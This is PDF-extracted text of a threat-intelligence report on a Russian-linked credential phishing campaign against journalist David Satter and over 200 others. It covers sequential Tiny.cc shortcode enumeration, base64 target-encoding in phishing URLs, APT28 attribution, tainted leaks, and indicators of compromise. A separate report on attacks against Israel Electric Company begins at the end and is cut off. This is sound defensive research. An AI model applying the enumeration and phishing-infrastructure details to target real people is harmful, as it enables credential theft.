Beginning with the shortened link sent to David Satter, we identified a predictable feature in
how the link shortener (Tiny.cc) generated its shortened URLs. This enabled us to identify over
200 additional targets of the same operation described in Part 1. This section describes the
process used to enumerate these targets, and further describes the links between this
operation and other publicly-reported Russian-linked phishing campaigns.
In September 2016, ThreatConnect published a blog post documenting phishing attempts
against contributors to the citizen journalism website Bellingcat and its founder Eliot Higgins.
The targeted contributors were actively engaged in reporting on the Russian involvement in the
July 17, 2014 downing of Malaysia Airlines Flight 17. ThreatConnect attributed these intrusion
attempts to Fancy Bear (aka APT28), a threat actor widely believed to be directly linked to the
Russian government. In an October update to this post, ThreatConnect documented an
additional spear phishing attempt against a Bellingcat contributor.
This latest credential phishing attempt was largely similar to the first email sent to David Satter
(see Part 1, The Case of David Satter). Both emails were sent at 10:59am EST using the same
sending address: g.mail2017[@]yandex.com. In addition, both shared a fake Gmail footer that
was distinctively modified from Gmail
s original footer.
20/43
Figure 21: Footer from the phishing emails sent to Bellingcat and David Satter showing
a distinctive misspelling (possibly to avoid spam filtering)
In both cases the malicious links embedded in these phishing emails were configured to
redirect the targets to addresses hosted on the URL shortening service Tiny.cc. As
ThreatConnect showed, the Tiny.cc link used against the Bellingcat contributor actually
redirected the victim to another shortened URL, this one hosted by a different shortening
service: TinyURL.com. Ultimately, this series of link redirections led to a malicious credential
phishing page hosted at the following URL:
hxxp://myaccount.google.com-changepasswordsecuritypagesettingmyaccountgooglepagelogin.id833[.]ga
Table 1: Domain hosting the credential phishing page
Using PassiveTotal, we examined the historic DNS resolution data for this domain name. The
results revealed that at the time of these phishing attempts, the domain id833[.]ga resolved to
IP address 89.40.181[.]119
the same Romanian IP address used to access David Satter
email account on October 7 (see Part 1, The Case of David Satter).
This evidence suggests that the Bellingcat contributor and David Satter were both targeted by
the same spear phishing campaign; this linkage will be explored further in the next section.
Tiny.cc Enumeration
In examining the Tiny.cc shortened URLs found within the spear phishing emails sent to David
Satter, we became curious as to the structure of how such links were constructed.
Tiny.cc provides a shortening service which allows users to create succinct URLs that redirect
to some defined, usually long, website address. By way of example, we created a Tiny.cc
shortened URL which redirects to a recent Citizen Lab report:
http://tiny.cc/bj87iy -> https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware/
In this example, the Tiny.cc shortcode would be bj87iy. In the Tiny.cc application back-end
database, this hash uniquely resolves to the target address of:
https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware/
After conducting tests, we determined that these shortcodes are assigned in a sequential
manner. For example, using the Tiny.cc API call for creating a shortened URL, we
programmatically generated 8 links with a one-second delay between each call. The resulting
shortcodes generated (in order) were as follows:
21/43
63q6iy
73q6iy
93q6iy
e4q6iy
p4q6iy
r4q6iy
t4q6iy
24q6iy
After conducting numerous similar tests, we determined that shortcodes constructed within
small temporal windows would be lexically close in the sense of the following
base36
alphabet
sequence:
a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9
Successive shortcodes are constructed by iterating the leftmost character through this base36
alphabet. Once all 36 characters have been exhausted, this leftmost character reverts to the
initial value of
, with the second character then iterating one position according to the same
alphabet. This iterative process continues for each position of the shortcode (see Figure 22),
enabling us to consider the shortcodes as a sort of base36
counter
Figure 22: Enumerating the base36 shortcodes used by tiny.cc
Given this understanding of the shortcode design, we can measure the notional
distance
between any pair of shortcodes. For example, the distance between the shortcodes bj87iy
and cj87iy would be 1, and the distance between bj87iy and bk87iy would be 36.
22/43
This distance measurement gives an idea of how close two shortcodes are, and thus by
extension, how close in time they were generated. We will revisit this notion of distance below.
Using this design knowledge, we considered the Tiny.cc shortcodes found in the October 5 and
7 phishing emails sent to David Satter. Using these as a starting point, we enumerated
approximately 4000 adjacent shortcodes for each, and then examined the target web
addresses to which these short links redirected. From this large list, we extracted all of the
associated destination links (see Figure 23) which redirected to the malicious phishing domain
described above in Table 1.
Figure 23: Some of the phishing links discovered during enumeration of the Tiny.cc
shortcodes
This enumeration led us to discover evidence suggesting that David Satter and the unnamed
Bellingcat journalist were but two targets of a much larger credential phishing campaign.
Notably, as mentioned above in Part 1: A Second Phishing E-mail, when we checked the
particular Tiny.cc shortcode received by Satter, the unshortened link to the phishing page had
been replaced with a benign URL: myaccount.google[.]com.
We were unable to conclusively determine the reason for this substitution. One theory
suggests that the campaign operators mistakenly shortened incorrect destination URLs, while
another posits that once the operators had successfully compromised a target
s account, they
would inoculate the Tiny.cc link provided in the phishing email. Indeed, in the same batch of
enumerated shortcodes from the October campaign, we found four additional shortcodes which
also pointed to myaccount.google[.]com.
Decoding the targets
We examined the
unshortened
URLs of shortcodes that were adjacent to the one sent to
Satter, and discovered 25 distinct destination addresses of the form:
https://www.google.com/amp/tinyurl.com/(redacted)
These addresses were redirects which leveraged the previously mentioned, Google-hosted,
open redirect page (google.com/amp/) to send a user to a link on the TinyURL.com shortening
service. In every case, these TinyURL.com links were each designed to send their intended
23/43
victims to a tailored version of the following, fake, Gmail login page:
hxxp://myaccount.google.com-changepasswordsecuritypagesettingmyaccountgooglepagelogin.id833[.]ga/security/signinoptions/password
This domain, discussed above and noted in Table 1, at the time the phishing emails were sent,
resolved to the Romanian IP address used to access Satter
s Gmail account (see Part 1).
In order to bolster the social engineering aspect of these fake Gmail login pages, the operator
used a series of base64-encoded URL parameter values in order to display the target
s email
address, and in some cases the target
s name and Google profile image, into the appropriate
fields on the fake login page.
Figure 24: TinyURL preview of a second level redirect of a phishing link
The following example URL illustrates the use of these parameters (Figure 25):
24/43
Figure 25: URL parameter decoding from a phishing link
By virtue of this pattern of URL parameters, we were able to determine the precise target of
each of the phishing links we discovered during our enumeration process. The significance of
this pattern of URL parameters will be revisited below in Part 3.
Digging Deeper
Extending the search for suspicious URLs by fully enumerating the entire six-character
shortcode sequence space in the above manner proved to be intractable. 5 However, the same
ThreatConnect report discussed above also documented a previous APT28-attributed phishing
attempt against Bellingcat journalist Aric Toler. On June 16, 2016, Toler was sent a strikingly
similar Google-themed phishing email containing a Tiny.cc shortcode. Following the same
process outlined above, we enumerated the shortcodes adjacent to the one published by
ThreatConnect.
In doing so, we discovered another group of targets
198 target email addresses in total. In
this earlier campaign, the unshortened URLs pointed directly to the likely phishing page
(Figure 26):
Figure 26: URL parameters in June campaign against Aric Toler
Notably, these links appear to be hosted on the Google Blogger service, and while these
pages were already taken offline when we attempted to examine them, the same characteristic
URL parameterization can be observed.
25/43
A brief analysis of the target list associated with these two campaigns is provided above (see
Pandora
s Un-Shortening: Civil Society Targets Emerge).
Testing the Lure
We measured the distance between successive malicious Tiny.cc shortcodes seen in the June
and October campaigns (Figure 27). In doing so, we observed fairly consistent distances
between the shortcodes, perhaps indicating that the operators were generating these links via
an automated process. However, one shortcode stood out, and we suspected this may have
been a manual operator test.
Figure 27: The anomalous distance of 305 immediately stood out from the average of
8.2, drawing our attention to the shortened link
According to the parameters obtained from the phishing URL associated with this anomalous
shortcode, we were able to decode the Gmail account targeted with this phishing link:
26/43
Parameter
Result after decoding
Email Address
myprimaryreger[@]gmail.com
Full Name
Google+ Profile Picture
Table 2: URL parameter values decoded
This Google account, myprimaryreger[@]gmail.com, was also used in the registration of at
least one other domain name which was linked in prior research to known or suspected APT28
activity. Such connections, while circumstantial, further support the link to Russia-based threat
actors.
In Appendix B we provide a brief description of why we think the account is being used by the
operator, and how the account uses Google Plus posts to embed images into phishing e-mails.
Part 3: Connections to Publicly Reported Operations
This section outlines the connections and overlaps between the operation described in this
report and other, publicly-reported Russian-affiliated cyber espionage campaigns.
The operator test uncovered during our enumeration of the Tiny.cc shortcodes (see Testing
the Lure above), provides a circumstantial link to APT28, however there are other potential
links. In this section, we outline other comparisons between this campaign and other publicly
reported operations that have a Russian nexus. We identify marked similarities to a collection
of phishing links now attributed to one of the most publicly visible information operations in
recent history: the targeting of the 2016 US Presidential Campaign.
A Bit More Abuse
The phishing URLs in this campaign were encoded with a distinct set of parameters using
base64. When clicked, the links provided key information about the targets to the phishing
website. An identical approach to parameters and encoding (see Figure 28 below) has been
seen before: in the March 2016 phishing campaign that targeted Hillary Clinton
s presidential
campaign and the Democratic National Committee. This similarity suggests possible code reuse: the two operations may be using the same phishing
The campaign that targeted the DNC also included the same Google security-themed phishing
ruse, and abused another URL shortening service, Bit.ly. In June 2016 Dell SecureWorks
published a report attributing the operation to APT28, a threat actor routinely associated with
27/43
the Russian government.
SecureWorks researchers were able to enumerate and analyze the targets of this campaign,
thus allowing them to describe the victimology:
individuals in Russia and the former Soviet states, current and former military and government
personnel in the U.S. and Europe, individuals working in the defense and government supply
chain, and authors and journalists
but also included email accounts linked to the November
2016 United States presidential election
This victimology strikes an immediate parallel to the target listing we have uncovered in our
enumeration of the Tiny.cc URLs.
Figure 28: Bitly link and ultimate phishing page address sent to John Podesta, former
chairman of the Hillary Clinton presidential campaign, in March 2016
Domain Schema Commonalities
We found similarities in domain naming, and subdomain structures, between this campaign
and operations linked to APT28.
The domain used in the campaign targeting Satter was id833[.]ga. At the time of the
campaign, this domain name was pointed to a server at IP address 89.40.181[.]119. Using
PassiveTotal, we observed other domain names sharing a similar naming scheme also
directed at this IP: id834[.]ga, and id9954[.]gq. While we did not observe any phishing links
for these alternate domains, there were identical subdomains registered for both:
Domain
Sub-Domain
id833[.]ga
myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin
id834[.]ga
myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin
id9954[.]gq
myaccount.google.com-changepassword-securitypagesettingmyaccountgooglepagelogin
This domain / subdomain naming schema is also extremely close to one featured in
Mandiant
s 2017 M-Trends report, in a phishing operation, linked to APT28, which targeted
OAuth tokens in an effort to obtain persistent access to a victim
s Google account, and to
28/43
bypass the security of two-factor authentication.
Domain linked to this campaign:
myaccount.google.com-changepasswordsecuritypagesettingmyaccountgooglepagelogin.id833[.]ga
Domain mentioned by Mandiant, linked to APT28:myaccount.google.comchangepassword-securitypagesettingmyaccountgooglepage.id4242[.]ga
The similarities in naming and subdomain structure are immediately apparent. The two
domains (id833[.]ga and id4242[.]ga) also share a common name server. However, we were
not able to find specific registration overlaps between the domains or servers.
Furthermore, during the campaign period, the domain identified by Mandiant, id4242[.]ga
resolved to 89.32.40[.]238. This IP also resolves to a range of other suspicious domains with
highly similar naming schemas to those connected to the infrastructure used against Satter.
The link used to phish John Podesta, as depicted above, also shares distinct naming and
subdomain similarities with domains linked to the phishing operation against Satter (see Figure
28):
Domain targeting Podesta, linked to APT28: hxxp://myaccount.google.comsecuritysettingpage[.]tk
During the campaign in March 2016, this domain was hosted at IP address 80.255.12[.]237
Publications from numerous private industry groups attribute 89.32.40[.]238 and
80.255.12[.]237 (as well as related domains) to APT28. While we are able to point out that
there are significant commonalities in domain naming and subdomain structure between the
campaign targeting Satter and domains linked to these IPs, we are not able to make a more
conclusive technical link to APT28.
While industry groups as well as the U.S. government have publicly connected APT28 with
Russian state actors, we are not able to use infrastructure analysis alone to conclusively
connect the operation against Satter to a particular state sponsor. Connecting this
infrastructure to a specific government would require additional evidence which is not, to our
knowledge, available in the public domain.
The Challenge of Attribution
While the order of events surrounding the phishing, credential theft, and eventual leak of
tainted documents belonging to David Satter would seem to point to CyberBerkut, the
characteristics of Russian information operations make the task of attribution to a state
sponsor challenging. As a consequence, there is no
smoking gun
connecting the evidence
we have assembled to a particular Russian government agency, despite the overlaps between
our evidence and that presented by numerous industry and government reports concerning
Russian-affiliated threat actors.
Addressing the topic of attribution requires nuance and appreciation of the unique character of
29/43
Russian cyber espionage: its deliberate cultivation of organized criminal groups as proxy
operators, and the high number of independently operating, overlapping, and sometimes
competing spy agencies and security services all of whom work within a broad culture of barely
concealed corruption. As one study on Russia notes, Russia
s many security agencies
granted considerable latitude in their methods, unconstrained by the concerns of diplomats or
the scrutiny of legislators.
Russia
s approach to the use of proxy actors in the criminal underworld in particular is
informed by a very elaborate strategy around information operations and control. Although this
strategy has roots that go back deep into Soviet (and even earlier Russian) history, it was more
fully elaborated as a component of hybrid warfare, also known as the Gerasimov doctrine or
non-linear warfare,
and infused with deeper resources after the
color revolutions,
the 2011
Moscow protests, and upon reflection of the events of the Arab Spring. The overall Russian
approach has been described as a form of
guerrilla geopolitics
in which
a would-be great
power, aware that its ambitions outstrip its military resources, seeks to leverage the
methodologies of an insurgent to maximise its capabilities.
Cultivating organized criminal
groups is a fundamental component of this approach, as evidenced in the annexation of
Crimea which was undertaken in coordination with criminal elements who provided
political
and military muscle.
Russian security officers are also known to routinely dabble in the
proceeds of underworld criminal operations for illicit revenue of their own, and as a result can
even prioritize criminal over national security concerns.
In the digital arena, this doctrine is manifest in the cultivation of Internet-focused organized
criminal groups who operate partially on behalf of or in support of the Putin regime, and
partially oriented around their own pecuniary gain in online financial fraud and other schemes.
There is evidence Russian hackers are being given wide latitude to undertake criminal
activities as long as it conforms to Russian security agencies
wishes. Multiple Russianaffiliated operators could compromise the same target unwittingly and without seeming
coordination. This
piling on
around a target further complicates attribution. This
complex proxy strategy, as well as the multiple, competing agencies behind the proxies, is
often lost or overlooked when companies and government agencies jump quickly to attribution
around Russian cyber espionage.
While it is possible that a proxy actor is implementing the front-end collection component of the
phishing campaign we are describing, the scale of the targeting also suggests a wellresourced actor, such as a nation state. The thread linking all of the targets is their connection
to issues that the Russian government cares about. The targets are people whose positions or
activities give them access to, or influence over, sensitive information of specific interest to
Russia. This links an otherwise extremely diverse target set, which ranges from domestic
Kremlin critics and journalists, to anti-corruption investigators, foreign government personnel,
and businesspeople.
The data collected from such a campaign would come in more than a dozen languages, and
concern a diverse range of political, military, and policy issues from at least 39 countries and
28 governments. In addition, such a campaign would be likely to generate large volumes of
30/43
data. For this reason, a professionalized, well-resourced operator would be needed for any
effective post-collection analysis of the stolen data. Even greater resources would be required
to analyse, and in some instances carefully modify in a short timeframe, the contents of stolen
email and cloud-storage accounts for the purposes of seeding disinformation via tainted leaks.
The diversity and presumed cost of analyzing the stolen data along with the clear Russian
nexus for the targets is only circumstantial evidence of a Russian connection. It should be
evaluated in the context of the other pieces of circumstantial evidence we present, including
the overlaps in tactics with known Russia-linked actors, and the prominent role of
CyberBerkut.
Part 4: Discussion
In this section, we examine the troubling relationship between espionage and disinformation,
particularly in its latest digital manifestation, and elaborate on how civil society is particularly at
risk from such new tactics.
Tainted Leaks: A New Trend
The recent theft and disclosure of documents (branded as a
leak
) from the presidential
campaign of Emmanuel Macron is the highest profile case in which it appears that falsified
documents were inserted amongst real, stolen documents. The documents falsely implied a
range of improper or questionable activities. The false stories implied by these documents
were then highlighted in campaigns promoted with twitter bots and other techniques. The leakbranded release had followed the release, several days earlier, of a quickly-debunked story,
supported by falsified documents, alleging that Macron held foreign bank accounts.
In the case of the leak-branded releases during the 2016 US presidential election, the publiclyavailable evidence connecting these releases with Russian-affiliated cyber operations is
largely circumstantial, but compelling. It is reported, and highly probable, that stronger
evidence is available in classified venues. Building on initial reports by Trend Micro that the
Macron campaign was targeted by APT28,
follow-up reports have pointed to Russian
involvement in the breach, and the tainted leaks.
The Macron case continues to develop, and many elements are still uncertain, including
whether the Macron campaign was deliberately seeding their own communications with false
documents, intended to slow down operators
analysis pipeline. However, it is not the first case
in which evidence or claims of tainted leaks have surfaced.
Documents stolen from the Open Society Foundations, which had been the victim of a breach,
were modified and then released in a tainted leak by CyberBerkut in a post dated November
21 2015. The tainting included careful alterations, such as modifying budget documents, to
make it appear that certain Russian civil society groups were receiving foreign funding. The
case became publicly visible because elements of the same stolen set were re-released on the
leak-branded website
DC Leaks,
without the tainting.
31/43
In the case of David Satter, whose personal email accounts had similarly been breached, and
then tainted, materials were edited, spliced, and deleted, while new text was added.
Fiction was added to fact to create a hybrid
tainted leak.
The tainted leak told a series of
new, false stories, intended not only to discredit Satter, but to support domestic narratives
familiar to many Russians: of foreign interference, and of a foreign hand behind criticism of the
government.
Falsehoods in a Forest of Facts
Recent leaks by genuine whistleblowers, as well as
leak
-branded releases of materials stolen
by cyber espionage operations (e.g.
DC Leaks
or
Macron Leaks
) are appealing because
they appear to provide an un-filtered peek at people speaking privately. Like an intercepted
conversation, they feel closer to the
truth,
and may indeed reveal unscripted truths about
people and institutions. It is hard not to be curious about what salacious details might be
contained within them. In the 2016 United States presidential election, it was evident that the
release, although clearly intended to influence the election, was viewed by most media
organizations as having intrinsic newsworthiness, and thus the contents of leaks were often
quickly amplified and repeated.
The potential of leaks to attract attention makes large dumps of stolen materials fertile ground
for tainting. A carefully constructed tainted leak included in a set of real stolen material is
surrounded by documents that, by juxtaposition, indirectly signal that it is legitimate. This could
help the tainted leak survive initial scrutiny by reporters and others seeking corroboration.
Coupled with a media strategy, or social-media amplification campaign that selectively
highlights the fake or the narrative that the fake supports, leak tainting poses a serious problem
to both the victim of the breach, and whoever is implicated by the disinformation.
The spread of disinformation can contribute to cynicism about the media and institutions at
large as being untrustworthy and unreliable, and can cultivate a fatigue among the population
about deciphering what is true or not. By propagating falsehoods, the aim is not necessarily to
convince a population that the falsehood is true (although that outcome is desirable) but rather
to have them question the integrity of all media as equally unreliable, and in doing so
foster a
kind of policy paralysis.
Tainted Leaks Place a Unique Burden on Breach Victims
Should a tainted document gain traction, there is a burden on the victim of the disinformation to
prove that the leaks are not genuine. This challenge may be difficult. Victims of breaches may
be unable, unwilling, or forbidden to release original documents. Moreover, they may not wish
to be drawn into fact-checking their own stolen data. This problem is likely to be especially true
if the operators behind the tainted leaks have chosen documents that are themselves
sensitive.
A Russian anti-corruption activist whose name has been seeded into such sensitive reports
may not be able to convince the original victim of the breach to release the authentic
document. Indeed, such a person may not even be able to determine exactly which parts of
32/43
the document are real, and which are fake, beyond what they know to be true about
themselves.
Meanwhile, members of the public do not have the ability to carefully verify the integrity of
such dumps, either as a whole, or specific documents within them. Indeed, even journalists
reporting on accusations or falsehoods may be unable to obtain explicit confirmation of which
exact material has been faked. If a tainted document is carefully constructed from real,
verifiable elements, it may be especially difficult to identify as a fake. Even if journalists do the
hard digging and analysis, they may not be able to publish their results in a timely enough
fashion to matter. By the time their work is complete, the false information may have
embedded itself into the collective consciousness.
Disinformation can persist and spread unless concerted measures are taken to counter it.
Even more insidious is the fact that studies have found that attempts
to quash rumors
through direct refutation may facilitate their diffusion by increasing fluency.
In other words,
efforts to correct falsehoods can ironically contribute to their further propagation and even
acceptance.
Not all tainted leaks work as intended to cause maximum harm. Almost immediately following
the
Macron Leaks,
the Macron campaign responded quickly, and stated that the
leaks
included fakes. In the fast-moving media environment in the days before voting, this move may
have led to uncertainty about the factual nature of the release in the minds of many journalists,
dimming enthusiasm to quickly report
finds.
Amplification of the
leaks
was further blocked
by a
recommendation to media
by the French electoral authority to not
relay
the leaks. The
authority pointed to the presence of fakes, and warned of possible legal implications for
reporting the story.
Following the voting, staff from the Macron campaign claimed in the media that the stolen
documents also likely contained fakes created by the campaign, designed to waste the time of
intruders. This claim also cast further doubt on the veracity of any documents contained in the
leaks.
Tainted Leaks: Old Methods, New Tactics
Stealing digital information for intelligence purposes is a well-known and commonly practiced
tactic used by states. However, a unique aspect of Russian cyber espionage distinguishing it
from other governments is the public release of exfiltrated data intended to embarrass or
discredit adversaries. Known as
kompromat
, this type of activity is common in Russia, and
was previously used by the Soviet Union, and is evident in the publication of emails on
Wikileaks related to United States officials involved in the 2016 U.S. presidential election
campaign.
Releasing Satter
s e-mails could be roughly described as kompromat. However, with his
cooperation we were able to identify a second feature of the release: the deliberate tampering
with the content of his messages. This mixing of fact and falsehood is thus also a
disinformation strategy.
33/43
In Russian / Soviet military doctrine, the practice of deliberately propagating forged documents
and disinformation is known as
dezinformatsiya
, referring to manipulation of information in
the service of the propagation of falsehoods. Although practiced for decades by Russia and
the Soviet Union, the use of dezinformatsiya in connection with cyber espionage is a new and
troublesome frontier in structured digital disinformation.
Why Target Civil Society?
Our investigation identified civil society targets inside and outside of Russia. This targeting is
consistent with a general consensus on how the Russian regime thinks: whether domestic or
foreign, civil society is treated as a threat to the regime, its extended kleptocracy, and the
sovereignty of the country.
There are at least two reasons why civil society factors highly into Russian perceptions of
threats. First, independent civil society groups can create difficulties for the regime by
spotlighting corruption and abuse of power, speaking freely about issues the government
would rather keep in the shadows, and mobilizing people into organized opposition.
Those unfamiliar with the Russian experience may overlook a second motivation, which is
drawn from the larger Russian narrative of humiliation and defeat at the hands of the United
States and its allies at the end of the Cold War. Some Russian leaders, especially those tied
to the old Soviet system, resent US triumphalism, and see local civil society (except for those
under their direct control) as instruments of US and western interference in Russian domestic
politics. For example, Putin used the term
active measures
to describe the actions of thenSecretary of State Hillary Clinton during the 2011 Moscow demonstration. This narrative of
Russia as a
besieged fortress
is used as justification for the repression and targeting of civil
society groups both inside Russia proper, in the former Soviet spaces, and abroad.
While often overlooked by western media and policymakers, this threat model translates in
practice into targeted digital surveillance operations on civil society, both domestically and
abroad. Of special concern to the government are NGOs, journalists, and activists that are
seen as having links to the West and / or are funded by western governments. Many of the
targets of this campaign are connected in some degree to United States-based think tanks and
fellowships.
Of equal concern to the government, however, are the actions of domestic NGOs and
individuals. As our report shows, a principal motivation for the targeting of David Satter and
the tainting of leaks derived from materials stolen from him was to falsely portray local Russian
groups as having affiliations and even funding ties to western organizations and the U.S.
government.
Conclusion
Tainted leaks are a growing and particularly troublesome addition to disinformation tactics, and
in the current digital environment are likely to become more prevalent. In the 2017 French
34/43
presidential election, tainted leaks appear to have been used in an attempt to discredit the
political party and candidate for election directly. The target of the tainting was roughly the
same entity that suffered the breach. In the cases we analyzed, however, tainted leaks were
used to discredit third parties who had not been the victims of the original breach. This
difference highlights yet another facet of the growing trend of leak-branded releases, and the
challenges they pose.
Tainted leaks
fakes in a forest of facts
test the limits of how media, citizen journalism, and
social media users handle fact checking, and the amplification of enticing, but questionable
information. As a tactic, tainted leaks are an evolution of much older strategies for
disinformation, and like these earlier strategies, pose a clear threat to public trust in the
integrity of information. Interestingly, while the tainting we describe appears to have a primarily
domestic aim, to discredit elements of the Russian opposition, it is readily applied globally.
The report identified a phishing campaign with over 200 unique targets from 39 countries. We
do not conclusively attribute the technical elements of this campaign to a particular sponsor,
but there are numerous elements in common between the campaign we analyzed and that
which has been publicly reported by industry groups as belonging to threat actors affiliated with
Russia.
Given Russia
s well-known preference for the use of proxy actors, it would be highly unlikely
that a group such as ours, which relies on open source information, would be able to discover a
conclusive link in a case like this. However, it is worth reiterating that the resources of a
government would likely be necessary to manage such a large and ambitious campaign, given
the number of languages spoken by targets, and their areas of work. The group includes a
former Russian Prime Minister, a global list of government ministers, ambassadors, military
and government personnel, CEOs of oil companies, and members of civil society from more
than three dozen countries.
The targets we found are connected to, or have access to, information concerning issues in
which the Russian government has a demonstrated interest. These issues range from
investigations of individuals close to the Russian president, to the Ukraine, NATO, foreign
think tanks working on Russia and the Crimea, grantmakers supporting human rights and free
expression in Russia, and the energy sector in the Caucasus.
Considering this primary Russian focus, as well as the technical evidence pointing to overlaps
and stylistic similarities with groups attributed to the Russian government, we believe there is
strong circumstantial
but not conclusive
evidence for Russian government sponsorship of
the phishing campaign, and the tainted leaks.
The civil society targets of this operation deserve special attention. At least 21% of the targets
from our set were journalists, activists, scholars and other members of civil society. All too
often, threats against civil society groups receive second-billing in industry reporting and media
coverage of government-linked operations.
Yet, in this case, members of civil society were both the targets of disinformation in the form of
35/43
tainted leaks, and represented a large proportion of the phished targets. In a cautionary note
for grantmakers, several dozen targets all held the same fellowship, from the same
organization. This common affiliation suggests that they may have been targeted because of
their relationship with the grantmaker.
We hope this report will encourage others to engage in further research into the techniques
used to propagate tainted leaks, as well as serving as a reminder of the often under-reported
presence of civil society targets among government-linked phishing and malware operations.
Acknowledgements
Special thanks to David Satter, Raphael Satter, and the Open Society Foundations for
cooperating and providing us with materials necessary to conduct the investigation.
Thanks to the Citizen Lab team who provided review and assistance, especially Bill Marczak,
Masashi Crete-Nishihata, Etienne Maynier, Adam Senft, Irene Poetranto, and Amitpal Singh.
We would like to thank additional researchers for comments and feedback including Jen
Weedon, Alberto Fittarelli, Exigent Petrel and TNG.
Support for Citizen Lab
s research on targeted threats comes from the John D. and Catherine
T. MacArthur Foundation, the Open Society Foundations, the Oak Foundation, Sigrid Rausing
Trust, and the Ford Foundation.
Appendix A: The Tainting
36/43
37/43
38/43
39/43
Figure 29: Full text of the tainted leak released by CyberBerkut showing tainting
Inserted Articles and their Contents
Article
Author
Theme
Informational
Stuffing: What is
Known about
Each
President Sergei
Roldugin
Elizaveta
Surnachyova
Discusses the relationship between Putin and Sergei Roldugin (a
cellist and financial associate of Putin). Roldugin is friends with many
Putin insiders, and holds a 3.2% stake in Bank Rossiya. He also
formerly ran two media groups and one oil company.
The Budget of
Katherine
Tikhonova
s Fund
Has Grown by
Half
Vyacheslav
Kozlov and
Ivan
Tkachyov
Innopraktika, a fund managed by Putin
s daughter, saw a very large
funding increase.
Igor Shuvalov
Tsar-apartment
Costs 600 Times
as Ordinary
Apartments He
Laughed at
Alexei
Navalny
Part of a series on the shell companies used by Igor Shuvalov, and his
purchase of a lavish and extremely expensive apartment.
Portraying
Benefactor:
Pays for the
Projects Related
to Putin
Examines the processes by which oligarchs repay the Russian
president by contributing money to
charities
and pet projects. These
include the funds managed by Tikhonova and Roldugin.
40/43
Article
Author
Theme
Journalists Have
Found Analogues
of the Ozero
Cooperative All
Over the Central
Russia
Slon
Relates to a Transparency International and Meduza.io investigation
documenting replications of the Ozero Cooperative (Putin
s dacha
organization) across Russia. This cooperative involves private dacha
(cottage) communities in which politicians, public servants and
businessmen live in close proximity, allowing them to conduct informal
meetings.
There, Beyond
the 6-Meter-High
fall of
Medvedev
Dacha
Alexei
Navalny
Discusses the 80 hectare (officially only 2 hectare) property belonging
to Medvedev, and paid for by oligarchs through contributions made to
charitable funds.
He is Putin
Cook. He is
Putin
s Troll. He
is a Billionaire
Alexei
Navalny
A look at Dmitry Rogozin, who runs the
troll factory
on Savushkina
Street in St. Petersburg. He also controls a series of unrelated
companies providing everything from catering to cleaning services to
power distribution which benefit from government contracts.
Apartment Worth
More than Half a
Billion
Was Found at
Putin
s ExBodyguard
Samename [sic]
Maria
Zholobova
and Maria
Borzunova
Putin
s former bodyguard and now governor of Tula region, Alexei
Dyumin, is registered as owning an apartment worth between 500-700
million rubles. Curiously, the apartment was purchased while Dyumin
was serving in the Russian Ministry of Defence. .
Samolet
Development is
Ready to IPO
Irina
Gruzinova,
Ivan
Vasiliev,
Irina
Skrynnik
Samolot Developments
is a property development firm building
condos. The company was purchased by Invest AG. Samolot
Developments managed to develop land and obtain permits where
others could not given its close ties to the governor of Moscow region,
Andrey Vorobev. His brother, Maksim, is one of Samolot
s founders.
How Katherine
Tikhonova
s Fund
is Doing
Alexei
Navalny
This report describes multi-million dollar contracts from state firms with
the science and tech fund managed by Putin
s daughter. The fund also
received
anonymous donations
totalling roughly half its budget,
leading to 2015 revenues of 877 million rubles. Includes quotes of
vague and nonsensical project descriptions used to justify payouts.
Appendix B: Test Account
Examining the Google+ page for the myprimaryreger[@]gmail.com account reveals a
suspicious series of posts:
41/43
Figure 30 B: Google+ profile page for myprimaryreger[@]gmail.com
Each of the Google+ profile posts by this user contain images which are routinely observed in
legitimate security warning emails sent by Google. Once an image file is uploaded to a
Google+ profile post, it is copied to Google servers and can be obtained using an associated
perma-link.
We suspect that the purpose of these posts is to allow the operator to embed links to Googlespecific images into their phishing emails in the hopes that linking to images hosted on Google
servers will somehow thwart Gmail malicious email detection controls.
Appendix C: Indicators of Compromise
Domain Names
IP Addresses
Email Addresses
id833[.]ga
89.40.181.119
g.mail2017[@]yandex.com
id834[.]ga
89.32.40.238
annaablony[@]mail.com
id9954[.]gq
80.255.12.237
myprimaryreger[@]gmail.com
id4242[.]ga
mail-google-login.blogspot[.]com
com-securitysettingpage[.]tk
Footnotes
Colour Revolution
is a term that has been widely used to describe the pro-democracy
protests and social movements that occurred in the early 2000s throughout the former Soviet
Union.
2 Several individuals were targeted in both of the two distinct campaigns we analysed.
3 The Citizen Lab receives financial support for its research from a range of funders, including
the Open Society Foundations. See https://citizenlab.ca/about/
42/43
Vedomosti
is a Russian language daily news service connected to The Moscow Times (and
in which The Financial Times and Dow Jones had a stake until 2015, when Vedomosti and
The Moscow Times were bought out by Russian business interests).
5 The six character base36 sequence space contains over 2.1 billion combinations. Checking
each one with a one-second delay (so as not to abuse the Tiny.cc web service) would take
approximately 66 years.
43/43
Operation Electric Powder
Who is targeting Israel Electric
Company?
clearskysec.com /iec/
Attackers have been trying to breach IEC (Israel Electric Company) in a year-long campaign.
From April 2016 until at least February 2017, attackers have been spreading malware via fake Facebook profiles
and pages, breached websites, self-hosted and cloud based websites. Various artifacts indicate that the main target
of this campaign is IEC
Israel Electric Company. These include domains, file names, Java package names, and
Facebook activity. We dubbed this campaign
Operation Electric Powder
Israel Electric Company (also known as Israel Electric Corporation)
is the largest supplier of electrical power in
Israel. The IEC builds, maintains, and operates power generation stations, sub-stations, as well as transmission and
distribution networks. The company is the sole integrated electric utility in the State of Israel. It installed generating
capacity represents about 75% of the total electricity production capacity in the country.
It is notable that the operational level and the technological sophistication of the attackers are not high. Also, they
are having hard time preparing decoy documents and websites in Hebrew and English. Therefore, in most cases a
vigilant target should be able to notice the attack and avoid infection. We do not have indication that the attacks
succeeded in infecting IEC related computers or stealing information.
Currently we do not know who is behind Operation Electric Powder or what its objectives are. See further discussion
in the Attribution section.
Impersonating Israeli news site
The attackers registered and used in multiple attacks the domain ynetnewes[.]com (note the extra e). This domain
impersonates ynetnews.com, the English version of ynet.co.il
one of Israel
s most popular news sites.
Certain pages within the domain would load the legitimate Ynet website:
1/13
Others, which are opened as decoy during malware infection, had copied content from a different news site:
The URL ynetnewes[.]com/video/Newfilm.html contained an article about Brad Pitt and Marion Cotillard copied from
